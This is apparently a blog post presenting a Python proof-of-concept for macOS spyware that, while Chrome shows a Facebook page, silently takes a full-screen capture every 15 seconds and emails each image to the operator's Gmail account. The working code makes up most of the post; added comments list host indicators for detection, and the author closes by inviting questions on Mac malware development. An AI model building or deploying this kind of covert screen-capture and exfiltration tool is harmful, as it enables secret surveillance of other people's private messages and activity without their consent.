Mac OSX Spyware – Facebook Activity Monitor
Introduction
This is a simple POC/program that allows you to monitor a user's Facebook session by taking screen captures of it every 15 seconds while the user is active on the site. I recommend using an e-mail account specifically for logging a user's session, because the program will flood your inbox with e-mails. I'm looking at using PIL to compress multiple images into a single GIF image and sending that once every hour; however, PIL is an external library, which is not ideal. Anyway, now that I've given you the lowdown on the program, let's take a look at the code!
POC
#!/usr/bin/python
"""
Proof-of-concept screen-capture monitor for macOS, keyed to Facebook in Chrome.

While Google Chrome is the frontmost application and the URL of its active
tab contains "facebook", the script saves a screenshot with `screencapture`
and e-mails it as an attachment through Gmail's SMTP service.

NOTE(review): the page's listing lost its line breaks and indentation, so the
nesting below is a reconstruction. As reconstructed, mail() runs after every
capture (which matches the "flood your inbox" remark in the introduction)
rather than once a day, as the original description of the program said.

What the script leaves behind, for anyone analysing or detecting it on a host:
  * process activity: the Python interpreter repeatedly spawns a shell that
    runs `osascript` (an Apple Event addressed to Google Chrome) and
    `screencapture -x`;
  * privacy controls: macOS 10.14 and later asks the user to approve one
    program sending Apple Events to another, and 10.15 and later places
    screen capture behind the Screen Recording permission, so expect consent
    prompts and matching entries in the Privacy settings;
  * files: PNGs named Facebook_at_<date>_<time>.png are written to the
    working directory, and nothing in this listing removes them;
  * network: authenticated SMTP submission to smtp.gmail.com on port 587,
    originating from a Python process.
"""
# Imports. The capitalised email.* module paths below exist only in Python 2,
# and AppKit is provided by the PyObjC bridge.
import os
import sys
import subprocess
import time
import glob
from time import gmtime, strftime
from AppKit import NSWorkspace
import smtplib
from email.MIMEMultipart import MIMEMultipart
from email.MIMEBase import MIMEBase
from email.MIMEText import MIMEText
from email import Encoders

# Sending account. The address and password sit in clear text in the script,
# so anyone who recovers this file from a host also recovers access to the
# mailbox the captures are sent from (and, in this listing, sent to).
gmail_user = "ianmarmour@gmail.com"
gmail_pwd = "XXXXXXXXXXX"

# The author left a placeholder here for launch-at-login registration;
# nothing in the listing implements it.

# Main loop: poll Chrome, capture when the condition holds, then mail the capture.
while 1:
    # Ask Chrome, through osascript, for the URL of the active tab of its
    # first window. os.popen runs the command line through a shell.
    opentab = os.popen("osascript -e \'tell application \"Google Chrome\" to get URL of active tab of window 1\'").read()
    facebook = "facebook"
    # Plain substring search: any URL containing "facebook" matches, not only
    # facebook.com itself. find() returns -1 when there is no match.
    decision = opentab.find(facebook)
    # Name of the frontmost application, as reported by NSWorkspace.
    activeAppName = NSWorkspace.sharedWorkspace().activeApplication()['NSApplicationName']
    # Capture only when the URL matched and Chrome is the application in focus.
    if (decision != -1) and (activeAppName == "Google Chrome"):
        # strftime() without a time tuple formats local time; the gmtime
        # import above is not used.
        time1 = strftime("%Y-%m-%d")
        time2 = strftime("%H:%M:%S")
        timestamp = "Facebook_at_" + time1 + "_" + time2 + ".png"
        # Full-screen capture into the working directory; -x suppresses the
        # shutter sound.
        os.system("screencapture -x " + timestamp)
        # NOTE(review): if the sleep really sits inside this branch, the loop
        # re-polls Chrome without pausing whenever the condition is false,
        # which would show up as a steady stream of osascript launches.
        # Confirm against the original listing.
        time.sleep(15)
        # Send the capture through Gmail, using the credentials defined above.
        def mail(to, subject, text, attach):
            """Send one message with a single file attachment via Gmail.

            to      -- recipient address
            subject -- Subject header
            text    -- body text
            attach  -- path of the file to attach; only its base name is
                       put in the Content-Disposition header
            """
            msg = MIMEMultipart()
            msg['From'] = gmail_user
            msg['To'] = to
            msg['Subject'] = subject
            msg.attach(MIMEText(text))
            part = MIMEBase('application', 'octet-stream')
            # The file object opened here is never closed explicitly.
            part.set_payload(open(attach, 'rb').read())
            Encoders.encode_base64(part)
            part.add_header('Content-Disposition', 'attachment; filename="%s"' % os.path.basename(attach))
            msg.attach(part)
            # Port 587 with STARTTLS: the login and the message are sent only
            # after the connection has been upgraded to TLS.
            mailServer = smtplib.SMTP("smtp.gmail.com", 587)
            mailServer.ehlo()
            mailServer.starttls()
            mailServer.ehlo()
            mailServer.login(gmail_user, gmail_pwd)
            mailServer.sendmail(gmail_user, to, msg.as_string())
            # Author's note: should be mailServer.quit(), but that crashes,
            # so the connection is closed without sending QUIT.
            mailServer.close()
        # The subject and body are fixed strings; the attachment is the
        # capture just taken.
        mail("ianmarmour@gmail.com", "Hello from python!", "This is a email sent with python", timestamp )
    # Has no effect as the last statement of the loop body.
    continue
If you have any questions regarding Mac OSX Malware development using Python feel free to contact me at ianmarmour@gmail.com or send me a direct message on Twitter using @ianmarmour!!!